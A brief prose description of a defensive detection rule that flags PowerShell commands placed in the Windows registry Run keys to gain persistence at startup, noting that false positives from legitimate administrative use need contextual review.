This detection rule identifies suspicious use of PowerShell commands or scripts that are potentially malicious, detected within the Windows registry's Run keys. These Run keys, specifically \Software\Microsoft\Windows\CurrentVersion\Run, are frequently targeted by threat actors to ensure persistence of malicious payloads upon system startup. The rule's selection criteria screen for specific attributes in registry entries that typically indicate the presence of PowerShell commands, including common cmdlets and arguments that are often utilized in obfuscated or deceptive ways to avoid detection. Recognizing that legitimate administrative tasks might also use these commands, the rule requires contextual analysis to reduce false positives. This detection is crucial for maintaining the integrity of systems and preventing unauthorized execution of potentially harmful scripts.